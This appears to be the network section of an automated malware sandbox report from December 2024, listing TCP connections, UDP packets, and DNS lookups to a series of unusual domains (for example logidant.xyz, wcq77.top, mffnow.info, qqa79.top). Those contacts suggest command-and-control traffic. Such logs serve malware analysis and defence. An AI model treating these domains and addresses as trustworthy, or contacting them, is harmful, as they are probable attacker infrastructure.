                                                                Dec 10, 2024 12:19:24.187335014 CET4996980192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:24.306723118 CET804996915.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:25.257389069 CET804996915.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:25.257493019 CET804996915.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:25.257541895 CET4996980192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:25.701484919 CET4996980192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:26.766557932 CET4997580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:26.885796070 CET804997515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:26.885857105 CET4997580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:27.014391899 CET4997580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:27.133666992 CET804997515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:27.981198072 CET804997515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:27.981302977 CET804997515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:27.981384039 CET4997580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:28.529685974 CET4997580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:29.549885988 CET4998580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:29.669612885 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:29.669727087 CET4998580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:29.690104961 CET4998580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:29.809672117 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:29.809678078 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:29.809722900 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:29.809736013 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:29.809848070 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:29.809851885 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:29.809966087 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:29.809971094 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:29.810014009 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:30.766110897 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:30.782341003 CET804998515.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:30.782385111 CET4998580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:31.201658964 CET4998580192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:32.220650911 CET4999280192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:32.339962006 CET804999215.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:32.340020895 CET4999280192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:32.353166103 CET4999280192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:32.472454071 CET804999215.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:33.443784952 CET804999215.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:33.443949938 CET804999215.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:33.444175005 CET4999280192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:33.446852922 CET4999280192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:33.566155910 CET804999215.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:38.919095993 CET5000980192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:39.038458109 CET8050009104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:39.038530111 CET5000980192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:39.058865070 CET5000980192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:39.178349018 CET8050009104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:40.562745094 CET5000980192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:40.682483912 CET8050009104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:40.682544947 CET5000980192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:41.579231977 CET5001680192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:41.698585033 CET8050016104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:41.700114012 CET5001680192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:41.716197968 CET5001680192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:41.835546970 CET8050016104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:43.217211962 CET5001680192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:43.337023020 CET8050016104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:43.342046976 CET5001680192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:44.237931967 CET5002280192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:44.357382059 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:44.357446909 CET5002280192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:44.377321959 CET5002280192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:44.556837082 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:44.556845903 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:44.556857109 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:44.556865931 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:44.556874037 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:44.556881905 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:44.556890011 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:44.556899071 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:44.556907892 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:45.891971111 CET5002280192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:46.011708975 CET8050022104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:46.012067080 CET5002280192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:46.908998013 CET5003080192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:47.028274059 CET8050030104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:47.028350115 CET5003080192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:47.038271904 CET5003080192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:47.159260035 CET8050030104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:49.366020918 CET8050030104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:49.366367102 CET8050030104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:49.366547108 CET5003080192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:49.369014978 CET5003080192.168.2.4104.21.96.1
                                                                Dec 10, 2024 12:19:49.488312006 CET8050030104.21.96.1192.168.2.4
                                                                Dec 10, 2024 12:19:55.030680895 CET5003580192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:19:55.150032997 CET805003513.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:19:55.150124073 CET5003580192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:19:55.164891958 CET5003580192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:19:55.284199953 CET805003513.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:19:56.248682022 CET805003513.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:19:56.248961926 CET805003513.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:19:56.250091076 CET5003580192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:19:56.670373917 CET5003580192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:19:57.689868927 CET5003680192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:19:57.809200048 CET805003613.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:19:57.809314013 CET5003680192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:19:57.823973894 CET5003680192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:19:57.943357944 CET805003613.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:19:58.906974077 CET805003613.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:19:58.907087088 CET805003613.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:19:58.907130003 CET5003680192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:19:59.326880932 CET5003680192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:00.346868992 CET5003780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:00.466202974 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:00.466280937 CET5003780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:00.483232975 CET5003780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:00.603116035 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:00.603127003 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:00.603141069 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:00.603158951 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:00.603212118 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:00.603219986 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:00.603426933 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:00.603449106 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:00.603646994 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:01.566864967 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:01.581087112 CET805003713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:01.581335068 CET5003780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:01.998863935 CET5003780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:03.018619061 CET5003880192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:03.138006926 CET805003813.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:03.138103008 CET5003880192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:03.149821997 CET5003880192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:03.269191980 CET805003813.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:13.262711048 CET805003813.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:13.262722969 CET805003813.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:13.262882948 CET5003880192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:13.265434980 CET5003880192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:13.385934114 CET805003813.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:19.230079889 CET5003980192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:19.349381924 CET8050039212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:19.349674940 CET5003980192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:19.524094105 CET5003980192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:19.643426895 CET8050039212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:20.618599892 CET8050039212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:20.618644953 CET8050039212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:20.618688107 CET5003980192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:21.029900074 CET5003980192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:22.052319050 CET5004080192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:22.171808004 CET8050040212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:22.171935081 CET5004080192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:22.234808922 CET5004080192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:22.354258060 CET8050040212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:23.438344955 CET8050040212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:23.438502073 CET8050040212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:23.441968918 CET5004080192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:23.748899937 CET5004080192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:24.768310070 CET5004180192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:24.887648106 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:24.887716055 CET5004180192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:24.914629936 CET5004180192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:25.034147024 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:25.034172058 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:25.034266949 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:25.034276009 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:25.034398079 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:25.034405947 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:25.034459114 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:25.034466028 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:25.034502983 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:26.157347918 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:26.248574972 CET8050041212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:26.254223108 CET5004180192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:26.420540094 CET5004180192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:27.441294909 CET5004280192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:27.560772896 CET8050042212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:27.568135977 CET5004280192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:27.576163054 CET5004280192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:27.696065903 CET8050042212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:28.835684061 CET8050042212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:28.835800886 CET8050042212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:28.835839033 CET5004280192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:28.839087009 CET5004280192.168.2.4212.123.41.108
                                                                Dec 10, 2024 12:20:28.958308935 CET8050042212.123.41.108192.168.2.4
                                                                Dec 10, 2024 12:20:34.330616951 CET5004380192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:34.450211048 CET805004338.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:34.450273991 CET5004380192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:34.470630884 CET5004380192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:34.589920044 CET805004338.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:35.983521938 CET805004338.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:35.983568907 CET5004380192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:35.983613014 CET5004380192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:35.983930111 CET805004338.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:35.984174967 CET5004380192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:36.103085041 CET805004338.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:36.104233980 CET5004380192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:37.003215075 CET5004480192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:37.122490883 CET805004438.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:37.122567892 CET5004480192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:37.141226053 CET5004480192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:37.260935068 CET805004438.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:38.655030012 CET5004480192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:38.656388044 CET805004438.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:38.656435966 CET805004438.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:38.656435966 CET5004480192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:38.656480074 CET5004480192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:38.774926901 CET805004438.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:38.774971008 CET5004480192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:39.679148912 CET5004580192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:39.798533916 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:39.798650026 CET5004580192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:39.814157009 CET5004580192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:39.934357882 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:39.934374094 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:39.934506893 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:39.934536934 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:39.934639931 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:39.934648991 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:39.934798002 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:39.934802055 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:39.934932947 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:41.326814890 CET5004580192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:41.330569029 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:41.330777884 CET5004580192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:41.446913004 CET805004538.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:41.454143047 CET5004580192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:42.346147060 CET5004680192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:42.465738058 CET805004638.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:42.465812922 CET5004680192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:42.477231979 CET5004680192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:42.596951008 CET805004638.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:45.184674978 CET805004638.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:45.185509920 CET805004638.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:45.185564041 CET5004680192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:45.187838078 CET5004680192.168.2.438.47.233.21
                                                                Dec 10, 2024 12:20:45.307142019 CET805004638.47.233.21192.168.2.4
                                                                Dec 10, 2024 12:20:50.776534081 CET5004780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:50.895824909 CET805004713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:50.895895004 CET5004780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:50.924683094 CET5004780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:51.044032097 CET805004713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:52.073338985 CET805004713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:52.073344946 CET805004713.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:52.080223083 CET5004780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:52.436372042 CET5004780192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:53.457185984 CET5004880192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:53.576411009 CET805004813.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:53.582192898 CET5004880192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:53.592627048 CET5004880192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:53.711883068 CET805004813.248.169.48192.168.2.4
                                                                Dec 10, 2024 12:20:55.436285973 CET5004880192.168.2.413.248.169.48
                                                                Dec 10, 2024 12:20:55.621264935 CET805004813.248.169.48192.168.2.4

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 10, 2024 12:17:41.105519056 CET5767553192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:17:41.544836044 CET53576751.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:17:58.206146955 CET5122553192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:17:58.714251995 CET53512251.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:18:13.166811943 CET5269553192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:18:13.702771902 CET53526951.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:18:28.455008030 CET5241253192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:18:29.033862114 CET53524121.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:18:43.379437923 CET6111853192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:18:44.373358965 CET6111853192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:18:45.103605032 CET53611181.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:18:45.103642941 CET53611181.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:18:59.751569986 CET5263053192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:19:00.097265959 CET53526301.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:19:14.692857027 CET5049053192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:19:14.938111067 CET53504901.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:19:23.003109932 CET6356053192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:19:23.984951973 CET53635601.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:19:38.456418991 CET5637953192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:19:38.916361094 CET53563791.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:19:54.378078938 CET5604753192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:19:55.027858973 CET53560471.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:20:18.283561945 CET5250553192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:20:19.227475882 CET53525051.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:20:33.852274895 CET5236453192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:20:34.325619936 CET53523641.1.1.1192.168.2.4
                                                                Dec 10, 2024 12:20:50.205380917 CET5645753192.168.2.41.1.1.1
                                                                Dec 10, 2024 12:20:50.773567915 CET53564571.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 10, 2024 12:17:41.105519056 CET192.168.2.41.1.1.10xb42dStandard query (0)www.1secondlending.oneA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:17:58.206146955 CET192.168.2.41.1.1.10xb3b9Standard query (0)www.logidant.xyzA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:18:13.166811943 CET192.168.2.41.1.1.10x60a6Standard query (0)www.wcq77.topA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:18:28.455008030 CET192.168.2.41.1.1.10x2a84Standard query (0)www.mindfulmo.lifeA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:18:43.379437923 CET192.168.2.41.1.1.10xf2b3Standard query (0)www.bienmaigrir.infoA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:18:44.373358965 CET192.168.2.41.1.1.10xf2b3Standard query (0)www.bienmaigrir.infoA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:18:59.751569986 CET192.168.2.41.1.1.10xd19eStandard query (0)www.exitomagnetico.onlineA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:14.692857027 CET192.168.2.41.1.1.10x520dStandard query (0)www.betmatchx.onlineA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:23.003109932 CET192.168.2.41.1.1.10xdf6aStandard query (0)www.bcg.servicesA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:38.456418991 CET192.168.2.41.1.1.10x777Standard query (0)www.mffnow.infoA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:54.378078938 CET192.168.2.41.1.1.10x136dStandard query (0)www.remedies.proA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:20:18.283561945 CET192.168.2.41.1.1.10x51fbStandard query (0)www.caj-bioteaque.onlineA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:20:33.852274895 CET192.168.2.41.1.1.10xe698Standard query (0)www.qqa79.topA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:20:50.205380917 CET192.168.2.41.1.1.10xb4b3Standard query (0)www.egyshare.xyzA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 10, 2024 12:17:41.544836044 CET1.1.1.1192.168.2.40xb42dNo error (0)www.1secondlending.one43.205.198.29A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:17:58.714251995 CET1.1.1.1192.168.2.40xb3b9No error (0)www.logidant.xyzlogidant.xyzCNAME (Canonical name)IN (0x0001)false
                                                                Dec 10, 2024 12:17:58.714251995 CET1.1.1.1192.168.2.40xb3b9No error (0)logidant.xyz45.141.156.114A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:18:13.702771902 CET1.1.1.1192.168.2.40x60a6No error (0)www.wcq77.topwcq77.topCNAME (Canonical name)IN (0x0001)false
                                                                Dec 10, 2024 12:18:13.702771902 CET1.1.1.1192.168.2.40x60a6No error (0)wcq77.top154.23.184.194A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:18:29.033862114 CET1.1.1.1192.168.2.40x2a84No error (0)www.mindfulmo.life209.74.77.108A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:18:45.103605032 CET1.1.1.1192.168.2.40xf2b3No error (0)www.bienmaigrir.info35.220.176.144A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:18:45.103642941 CET1.1.1.1192.168.2.40xf2b3No error (0)www.bienmaigrir.info35.220.176.144A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:00.097265959 CET1.1.1.1192.168.2.40xd19eNo error (0)www.exitomagnetico.online172.67.182.171A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:00.097265959 CET1.1.1.1192.168.2.40xd19eNo error (0)www.exitomagnetico.online104.21.36.5A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:14.938111067 CET1.1.1.1192.168.2.40x520dName error (3)www.betmatchx.onlinenonenoneA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:23.984951973 CET1.1.1.1192.168.2.40xdf6aNo error (0)www.bcg.services15.197.204.56A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:23.984951973 CET1.1.1.1192.168.2.40xdf6aNo error (0)www.bcg.services3.33.243.145A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:38.916361094 CET1.1.1.1192.168.2.40x777No error (0)www.mffnow.info104.21.96.1A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:38.916361094 CET1.1.1.1192.168.2.40x777No error (0)www.mffnow.info104.21.112.1A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:38.916361094 CET1.1.1.1192.168.2.40x777No error (0)www.mffnow.info104.21.32.1A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:38.916361094 CET1.1.1.1192.168.2.40x777No error (0)www.mffnow.info104.21.80.1A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:38.916361094 CET1.1.1.1192.168.2.40x777No error (0)www.mffnow.info104.21.64.1A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:38.916361094 CET1.1.1.1192.168.2.40x777No error (0)www.mffnow.info104.21.16.1A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:38.916361094 CET1.1.1.1192.168.2.40x777No error (0)www.mffnow.info104.21.48.1A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:55.027858973 CET1.1.1.1192.168.2.40x136dNo error (0)www.remedies.pro13.248.169.48A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:19:55.027858973 CET1.1.1.1192.168.2.40x136dNo error (0)www.remedies.pro76.223.54.146A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:20:19.227475882 CET1.1.1.1192.168.2.40x51fbNo error (0)www.caj-bioteaque.online212.123.41.108A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:20:34.325619936 CET1.1.1.1192.168.2.40xe698No error (0)www.qqa79.topqqa79.topCNAME (Canonical name)IN (0x0001)false
                                                                Dec 10, 2024 12:20:34.325619936 CET1.1.1.1192.168.2.40xe698No error (0)qqa79.top38.47.233.21A (IP address)IN (0x0001)false
